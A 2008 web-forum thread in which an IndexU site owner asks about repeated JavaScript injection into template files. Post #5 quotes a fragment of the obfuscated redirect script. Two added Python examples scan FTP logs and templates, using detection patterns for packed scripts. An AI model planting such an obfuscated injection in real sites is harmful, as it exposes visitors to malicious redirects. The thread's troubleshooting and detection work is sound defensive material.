#1 (permalink)  
Old 04-29-2008, 05:49 AM
Registered User
 
Join Date: Mar 2007
Posts: 75
Voyageur is on a distinguished road
Default Virus !!!

Hello,

I have a virus or spyware in my IndexU website; when I access the admin area the browser refreshes to a Russian URL!!!

Does anyone else have this problem?
  #2 (permalink)  
Old 04-29-2008, 05:55 AM
Registered User
 
Join Date: Jan 2008
Posts: 106
Warz is on a distinguished road
Default

It's probably someone who managed to insert a virus code... Could be server security issues also... Try to find the code and remove it.
  #3 (permalink)  
Old 04-29-2008, 10:01 AM
Registered User
 
Join Date: Aug 2007
Posts: 85
richrf is on a distinguished road
Default

Is this the result of an SQL injection security leak? What version are you using? Thanks.

Rich
  #4 (permalink)  
Old 04-29-2008, 12:19 PM
Nicecoder Team
 
Join Date: Jun 2002
Location: Winnipeg Canada
Posts: 4,018
Bruceper is on a distinguished road
Default

Send me your ftp login and password as well as your indexu login and password.

I would also ask for your cpanel login and password so I can check logs and see how/what was done.

I'll also want your IP address for when I'm checking the logs.

You can send it to me via PM or to support [at] nicecoder.com

For now just leave the site alone; every action you take causes the logs to fill up and may push off the info we want to look at.
  #5 (permalink)  
Old 04-29-2008, 02:06 PM
Registered User
 
Join Date: Mar 2007
Posts: 75
Voyageur is on a distinguished road
Default

Hi Bruceper,

I find this code in the footer and header:

<script language=JavaScript>function ehban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,59, 51,6,33,44,30,4,28,16,0,0,0,0,0,0,42,57,21,2,36,54 ,56,25,3,8,55,52,18,17,46,53,34,61,37,40,47,20,58, 38,26,29,49,0,0,0,0,22,0,13,27,60,24,35,39,45,7,5, 0,32,10,48,19,15,50,1,9,23,31,12,11,43,14,62,41);f or(j=Math.ceil(l/b);j>0;j----REMOVED----EFOxNIDapGK6suDtNIWUpGEsPrR8L8po2z2re8ElNSW7TYDaEd PHbgO6PGe8E5WBCzWL@FOspGe_JSO31gKKPGeM6QP_pFRY3agd EdDsTIWsEzRU3aKnTu2vf8p9vgJr0ufxfup6vgJbfge9EGeMLc pv28EMprD63Ge7eupvfgPaCdR8LcEYCzPr_rWjxcR_6rfbt8Z_ HAfvPrR865J9H')</script>

I removed it from the footer template but I found another in the admin template footer; my admin panel refreshes to http://www.REMOVED

Maybe this comes from my computer when I edit files? Because I have some spyware, but I have Outpost, which stops it.

Do you still need information to access my website? I don't have cPanel, only phpMyAdmin.

Thanks for help

Last edited by Bruceper; 04-29-2008 at 02:08 PM.
  #6 (permalink)  
Old 04-29-2008, 02:12 PM
Nicecoder Team
 
Join Date: Jun 2002
Location: Winnipeg Canada
Posts: 4,018
Bruceper is on a distinguished road
Default

I removed some info from your post, no real need to have it public.

Looks like you've definitely been hacked, but the question is how. It appears to be typical "wannabe hacker loser" javascript injection.

Yes, a trojan could have sniffed your password from your home computer easily.

phpMyAdmin access won't help; I want to see logs that will show where/when/how the user logged in. That can only be done typically via a control panel or from root.

Do you have an access_log file? or any other log file for apache or your ftp daemon?
  #7 (permalink)  
Old 04-29-2008, 04:57 PM
Registered User
 
Join Date: Dec 2007
Posts: 70
dePaulus is on a distinguished road
Default

Replace the document.write() call with an alert() and run it in your address bar to have the deciphered output alerted for you.
  #8 (permalink)  
Old 04-29-2008, 11:02 PM
Nicecoder Team
 
Join Date: Aug 2001
Location: Indonesia
Posts: 3,292
dody is a name known to all
Default

I think it was because the hacker is trying to insert JS code when filling in the form.

Indexu has the ability to check for this kind of hacking and will remove the JS code. But it seems the JS code may be unusual and Indexu failed to remove it completely. Since your data is safe, I think the hacker failed, but still caused damage to your website.

Now the problem is to find where the JS code is, and after this we need to remove it. A quick look will be 'view source'.
  #9 (permalink)  
Old 04-29-2008, 11:12 PM
Nicecoder Team
 
Join Date: Jun 2002
Location: Winnipeg Canada
Posts: 4,018
Bruceper is on a distinguished road
Default

The poster still has not provided logs or a login or even a URL to confirm any of this.
  #10 (permalink)  
Old 05-18-2008, 04:04 PM
Registered User
 
Join Date: Mar 2007
Posts: 75
Voyageur is on a distinguished road
Default

Hi,

I'm back!

In fact it's not a problem with IndexU. I have the virus on all my websites, always in the template files, and Google has put a warning in the search results: "this site can harm your computer".

I removed the hack code from my template files, and all seems to be working well now.

I noticed what dody said in a post here: when I'm on the IndexU control panel I often see someone trying to add a site with an amazing URL like "http://www.example.ru/?image.gif", an invalid URL and always a Russian URL; the hacked pages refresh to a Russian URL too.

I think the virus comes from my computer. Not a problem with IndexU!!
  #11 (permalink)  
Old 05-20-2008, 05:07 AM
Registered User
 
Join Date: Mar 2007
Posts: 75
Voyageur is on a distinguished road
Default

Hi,

The viruses are coming back on all my websites!!

Does anyone know a good web antivirus? I think the viruses are at my host.

Thanks
  #12 (permalink)  
Old 05-20-2008, 12:41 PM
Nicecoder Team
 
Join Date: Jun 2002
Location: Winnipeg Canada
Posts: 4,018
Bruceper is on a distinguished road
Default

There isn't one. If they are coming back it's because someone is placing them there.
  #13 (permalink)  
Old 05-21-2008, 04:29 AM
Nicecoder Team
 
Join Date: Aug 2001
Location: Indonesia
Posts: 3,292
dody is a name known to all
Default

You can check the IP: are they from your IP? If not, someone else is doing this, not from your PC.
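The IP check suggested above can be run against the FTP daemon's transfer log. This is an added example, not part of the original posts: it assumes the host writes the common xferlog layout, and the sample lines, addresses, paths and the `/templates/` marker are constructed for illustration.

```python
# Constructed sample in the xferlog layout (wu-ftpd, ProFTPD, vsftpd).
# Fields: 5 date tokens, seconds, host, size, path, type, flag,
# direction (i=upload), mode, user, service, auth, auth-id, status (c=complete).
SAMPLE_XFERLOG = """\
Tue May 20 03:12:44 2008 1 198.51.100.23 5120 /home/site/templates/footer.html a _ i r siteuser ftp 0 * c
Tue May 20 03:12:45 2008 1 198.51.100.23 4987 /home/site/admin/templates/footer.html a _ i r siteuser ftp 0 * c
Tue May 20 03:12:46 2008 1 198.51.100.23 0 /home/site/templates/header.html a _ i r siteuser ftp 0 * i
Tue May 20 09:30:02 2008 2 203.0.113.10 5001 /home/site/templates/footer.html a _ i r siteuser ftp 0 * c
Tue May 20 09:31:10 2008 1 198.51.100.23 20480 /home/site/images/logo.gif b _ o r siteuser ftp 0 * c
"""


def foreign_uploads(log_text, owner_ips, path_marker="/templates/"):
    """Return (timestamp, host, user, path) for each completed upload of a
    template file that came from a host outside owner_ips."""
    hits = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 18:
            continue  # truncated or non-xferlog line
        host, path, direction, user, status = f[6], f[8], f[11], f[13], f[17]
        if direction != "i" or status != "c":
            continue  # keep only completed incoming transfers (uploads)
        if path_marker in path and host not in owner_ips:
            hits.append((" ".join(f[0:5]), host, user, path))
    return hits


def by_host(hits):
    """Group uploaded paths per source host so repeat re-infection stands out."""
    grouped = {}
    for _ts, host, _user, path in hits:
        grouped.setdefault(host, []).append(path)
    return grouped


if __name__ == "__main__":
    # 203.0.113.10 stands in for the site owner's own address.
    for hit in foreign_uploads(SAMPLE_XFERLOG, {"203.0.113.10"}):
        print(*hit)
```

Uploads from an unknown address under the owner's FTP account point to stolen credentials; no matching uploads at all while the files keep changing points to something writing them on the server itself.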
  #14 (permalink)  
Old 05-22-2008, 07:28 AM
Registered User
 
Join Date: Mar 2007
Posts: 75
Voyageur is on a distinguished road
Default

I think there's a trojan in my web hosting account.

The files on my computer are clean. When I see problems with my web site I go to my FTP account and find javascript code in my template files (on all my web sites). I replace the template files and it's OK; after some hours the javascript code comes back in my template files. That's why I believe the virus is not on my computer but in my hosting account.

I have an idea: lock the template files (no write permissions); maybe that resolves the problem.

It must be something I have downloaded, I think!!!
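To pin down when the script reappears in restored templates, a hash baseline plus a check for packed inline scripts can be run on a schedule. This is an added example, not part of the original posts: the `*.html` pattern, the function names and the heuristics (a `document.write`/`eval`/`unescape` call next to a long quoted blob) are assumptions modelled on the snippet quoted earlier in the thread.

```python
import hashlib
import re
from pathlib import Path

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
SINK_RE = re.compile(r"document\.write|\beval\s*\(|\bunescape\s*\(")
BLOB_RE = re.compile(r"""['"][^'"\s]{120,}['"]""")  # long quoted run, no spaces


def packed_scripts(html):
    """Inline <script> bodies that pair a write/eval sink with an encoded blob."""
    return [body for body in SCRIPT_RE.findall(html)
            if SINK_RE.search(body) and BLOB_RE.search(body)]


def snapshot(root, pattern="*.html"):
    """Map each template's relative path to its SHA-256 (the known-good baseline)."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob(pattern))}


def audit(root, baseline, pattern="*.html"):
    """List (path, status, packed_script_count) for every template that is
    new, modified or missing compared with the baseline."""
    root = Path(root)
    report = []
    for rel, digest in snapshot(root, pattern).items():
        if baseline.get(rel) == digest:
            continue  # unchanged since the clean copy was recorded
        html = (root / rel).read_text(errors="replace")
        status = "modified" if rel in baseline else "new"
        report.append((rel, status, len(packed_scripts(html))))
    report += [(rel, "missing", 0) for rel in baseline
               if not (root / rel).exists()]
    return report
```

Take the snapshot right after restoring clean templates and keep it off the server; the timestamp of the first audit that reports a change narrows the window to search in the host's logs.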
  #15 (permalink)  
Old 05-22-2008, 10:27 AM
Nicecoder Team
 
Join Date: Jun 2002
Location: Winnipeg Canada
Posts: 4,018
Bruceper is on a distinguished road
Default

It's going to be a script running as root that is injecting code. Talk to your host about this.
 
